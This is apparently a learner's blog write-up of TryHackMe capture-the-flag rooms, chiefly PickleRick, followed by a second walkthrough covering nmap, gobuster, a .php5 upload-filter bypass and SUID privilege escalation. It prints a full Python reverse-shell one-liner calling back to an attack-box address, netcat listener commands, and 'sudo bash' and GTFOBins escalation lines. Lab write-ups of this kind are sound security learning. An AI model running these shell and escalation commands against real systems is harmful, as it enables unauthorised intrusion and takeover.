I'm back at the PickleRick CTF Room in TryHackMe today. After a good day in the office, with a few hints from a friend, I'm back on track with a few potential leads.

As it turns out, the directory scanning tools I was using yesterday have some additional features I was unaware of; These features include an option for a second loop including any potential file extensions you may want to look for. In this case that means I was ONLY searching for directories yesterday, but not any files within said directories, or otherwise. Turns out searching for files inside directories is pretty important went it somes to reconaissance.

When using Gobuster there is an additional flag I could have been using, the -x (file extensions) flag. it can be used such as:

gobuster dir -u url.to.website -w path/to/wordlist -x ext,ext2,ext3,ext4 -t (threadcount)

this will check each word in the wordlist, such as 'portal' on it's own, as well as with each extension you specify. this means that a directory such as "portal" now gets the following checks: url/portal url/portal.ext url/portal.ext2 url/portal.ext3 url/portal.ext4

This was a missing piece in yesterday's puzzle.

After running this command:

gobuster dir -u PickleRickIP.p.thmlabs.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x jpg,jpeg,php,gif -t 10

we find a few sites...

portal.php login.php

Here we see a username and a login page. Before we try anything fancy, let's just try the username R1ckRul3s, with the password found in Robots.txt, Wubbalubbadubdub

looks like we got lucky. This gets us in, and we're able to see a myriad of options, most of which seem to be locked behind an admin level permissions of sorts.. the 'real' rick. fortunately we have an input panel... not sure what it does, but let's try stuff!

Back when I did the OWASP top 10 training room on TryHackMe, I learned about some XSS attacks. I am curious to know if anything like that works here...

tried to create a basic popup alert: , but to no avail.

Seems like no? But I haven't exhausted all options. I did this, but this is prone to not work, generally it needs to be masked as an onerror action to loading an image to not get blocked by basic WAFs.

anyways, I was inspecting the webpage, I was able to find a weird comment that looked like a base64 string, I could tell from the double == padding at the end, and characters that seemed like they were all in the 64 character set which is required of base64. (2^6 unique characters). Something strange happened though, when I tried to punch it into an online base64 decoder... it told me 'malformed input'! Took me a second to figure out what was going on, but I am nothing if not stubborn. I was sure I recognized something fishy going on, so I was persistent, and punched it into a program I built some time ago that would lets call it... 'naively' follow an algorithm to convert any modulo of 6 bits (base64 character set) to their 8 bit (256 bit (ascii) character set) equivilent... and when it was done, it still looked like base64. WHAT?

so I did it again... and again... and again... again!? again...

Eventually baking my way all the way down this list... Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0==

to this: VmpGU1NtVkdTWGxTYkdScFUwWktjRlZyVmt0VE1WWnhVMjA1VG1KSGVIbFhhMXBoVlZaV1ZVMUVhejA= to this: VjFSSmVGSXlSbGRpU0ZKcFVrVktTMVZxU205TmJHeHlXa1phVVZWVU1Eaz0 to this: V1RJeFIyRldiSFJpUkVKS1VqSm9NbGxyWkZaUVVUMDk= to this: WTIxR2FWbHRiREJKUjJoMllrZFZQUT09 to this: Y21GaVltbDBJR2h2YkdVPQ== to this: cmFiYml0IGhvbGU= to this: rabbit hole

and that's exactly what it felt like I was doing... going way down a rabbit hole, just hoping to get lucky. Now I'm here and not sure what to do with the information other than to execute it as a command... nothing.

well, I SUPPOSE something I could try would be just to input an actual ubuntu command, since I know this box is running ubuntu (I discovered this, yesterday.)

'ls' ... I found a clue! (clue.txt), and (Sup3rS3cretPickl3Ingred.txt) perhaps this is the first ingredient. I'll cat this file to read it's contents from the command panel, next. hopefully other commands work just the same...

in fact, after I try this, perhaps I'll try launching a reverse shell just so I can work a little bit easier as this website from a netcat listener... anyways.

'cat Sup3rS3cretPickl3Ingred.txt'

fail! This command was disabled to make it more difficult for future rick (which I guess is me?!). so sad.

Maybe I can just open it like I did robots.txt earlier. success! I have discovered the first ingredient.

'https://PickleRickIP.p.thmlabs.com/Sup3rS3cretPickl3Ingred.txt' mr. meeseek hair

I wonder what's in clue.txt... The clue is to look around the file system for other ingredient!

as it would appear, used the 'pwd' command, I am currently in the /var/www/html directory. time to look around.

I seem to be unable to traverse directories, so I'll have to search from here. ls /home shows me there are two users, 'rick' and 'ubuntu'. In rick dir, there is a dir called 'second ingredients'

Alright, so I plugged away as best as I could using the command line baked into this website but honestly it was kind of brutal. I tried using netcat, but this device doesn't seem to have netcat installed. I ended up using a python3 script from revshell.com:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKBOX IP",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

to pop a reverse shell to my netcat listener which I had running on my machine using nc -lvnp 1337

time to upgrade this guy to a more stable shell. I can do this easily with a command I have used in the past.. because I already know www-data (the user I am now) can run python3, I can use this:

python3 -c 'import pty; pty.spawn("/bin/bash")'

to have a stable shell.

now, I can either look around and see what I can find, or i can attempt to escalate permissions. I'd like to do that first.

lets try sudo something just to see if I can....

sudo -l is a great one to try first. it'll show me what all my user can do

well, that worked.. didn't even ask for a password. I can do it all.

can I have root?

sudo bash

I can. :^)

I wonder what I can find now!

I'm not sure where to start, but what I can do it start from the top of the directory tree, and work my way down.. I know that second ingredients is in /home/rick/second ingredients, but I don't know what to do with that yet. I couldn't get to it earlier when I couldn't use 'cat' from the webportal, but maybe I can now.

I accidentallied on the 3rd ingredient. fleeb juice. it was just sitting in the home directory of root.

As it turns out, the second ingredient was as simple as 'cat "/home/rick/second ingredient"' 1 jerry tear I just couldn't use that command from the web ui.

I think my biggest takeaways from completing this CTF, are that I need to start doing the obvious things first. I probably could've saved an hour of pondering time had I just tried 'ls' in that command box in the first place, instead of thinking 'rick' would've had custom obfuscated commands somehow baked into his web front end.

Further to this, more experience with the tools I am using, as well as with whatever other tools might be out there will come in handy big time. I got lucky a few times (like with the python3 script just sort of working.. why would this server have python3 in the first place?), so some takeaways are definitely to become more comfortable enumerating, or perhaps have a sort of 'plan of attack' where I have a bunch of standard practices lined up either in my head or on paper, for 'things to do when x happens'.

anyways, That's the box!

Standard, nothing to note here.

2. Reconnaissance

Scan the machine, how many ports are open? Nmap is free and open source utility for network discovery and security. Nmap.org I'll use it to map our which ports are open on the machine. The Nmap scan I will run on this machine is: nmap -sC -sV (machine IP) -sC flag designates: 'script default', and will check for any scripts running while it checks the ports. -sV flag designates: Service/Version, and will check for services running on those ports, as well as associated versions.

Scan the Machine using Nmap

using Nmap -sC -sV (machine_IP), I was able to find two open ports, 22, which is running the service ssh, using OpenSSH version 7.6p1, on an Ubuntu Server. 80, which is running the service http, using apache 2.4.29, on an Ubuntu Server. More information on how I use Nmap can be found here: %[network-mapping-or-nmap]

Finding Directories using GoBuster

Once I knew there was an http site running, I had a few options on how to enumerate/find any directories on the site. GoBuster was one, but Dirbuster, and ffuf were other options I could have used.

The command I used was: "gobuster dir -u http://(machine_ip) -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50"

This took some time. Let me break down for you what this command is doing. 'gobuster' designates the application call. 'dir' argument designates 'directory/file enumeration' mode. 'http://(machine_ip)' is the fqdn (fully qualified domain name) of the site. '-w (file_path)' designates a specific wordlist for GoBuster to use. '-t 50' designates the amount of threads or 'open connections' to the http site at one time. the default is 10, but I used 50 because I am impatient and 10 was taking too long.

Results of GoBuster

Eventually, a few directories were found. /panel/, /uploads/, /css/, /js/,

Something to take note of, is under /panel/, we are able to arbitrarily upload files, of which we can then view at /uploads/ Perhaps we can use this to upload something executeable...

3. Getting a Shell

Getting a Reverse Shell can sometimes be completed by opening up a listener on your attacker machine, such as netcat, and then uploading a .php file with a malicious payload, then 'opening' the file on the webpage in question, and having that payload execute, calling home to your attacking machine.

Online I was able to find this site: https://www.revshells.com/, which has many pre-built 'reverse shell' payloads available. Now that I have a reverse shell payload selected, I'll set up my netcat listener.

nc -lvnp 1337 'nc' designates the application call for 'netcat' '-lvnp 1337', l = listen mode, v = verbose, n = numeric ip address (no dns), p 1337 = which local port to listen on.

I am using the 'PHP PentestMonkey' reverse shell template, and have created a file called 'RevShell.php', with the payload in it. then, I made sure this file was executable by using the following command to change permissions on the file. 'sudo chmod +x RevShell.php' Now, I'll go to (machine_ip)/panel/ to upload my file.

BUT! It looks like the upload of .php files is blocked! Time to find a way around this...

File Upload Restriction Bypass

I could probably write an entire blog on this, but for the purposes of this room in TryHackMe, there are a few specifics you need to know... Some websites whitelist or blacklist file uploads by extension type. .php extension is blocked in this case, and we need to find a way to upload our payload to execute it from the remote machine. For more information, here is an awesome article from exploit-db.com: File Upload Restriction Bypass

Anyways, this part will take some trial and error until you find a way to get past the websites blacklisting of your file extensions. Eventually, I found that 'RevShell.php5' was able to be uploaded successfully, and as long as I remembered to make that file executeable, I was able to run it from the remote machine, simply by opening up that .php site from the web.

With any luck, you should now see a shell open in your netcat terminal, but this isn't a stable shell, and if you're not careful you'll have to re-establish this session.. let's spawn a stable shell using python!

python -c 'import pty;pty.spawn("/bin/bash")' should do the trick.

Now that we have a bash shell open, let's look for that user.txt flag.

Finding files in linux

we can use the 'find' tool to find specific files on a linux system. 'find / -type f -name file-to-find.ext' is the format. looks like there are a bunch of directories we don't have access to yet, luckily, the file we were looking for happens to be somewhere that we can access!

The first thing you might want to do when you finally access a shell of a machine is celebrate, but there might be some heavy restrictions on the user level permissions you've obtained. check around using some of the following commands: whoami sudo -l

4. Privilege Escalation

Now that we have a shell, let' escalate our privileges to root. We're prompted here to find files with SUID permissions. SUID permission level means 'Set owner User ID', which essentially means that if an application or script is set with this level of permissions, that when the command is run to launch this application, it's effective user ID becomes that of the owner of the file, instead of the user running it.

We can search for such files using the following command. find / -user root -perm -4000 -print 2>/dev/null

From here, look through all of the different applications and look for one that you might be able to use to leverage that applications permissions, to execute arbitrary code. Python is a popular scripting language, so I bet we can do something with that. GTFOBins is an awesome resource for priv esc. I'm going to search for python here, and find something I think I can use. (hint: SUID)

The snippet of code I found on GTFOBins to escalate privileges is: python -c 'import os; os.execl("/bin/sh", "sh", "-p")' which worked well.

Now we have root level permissions, running via the shell we opening via python. Finally, we're prompted to find the root.txt flag, which we can do the same way we found the user.txt flag earlier!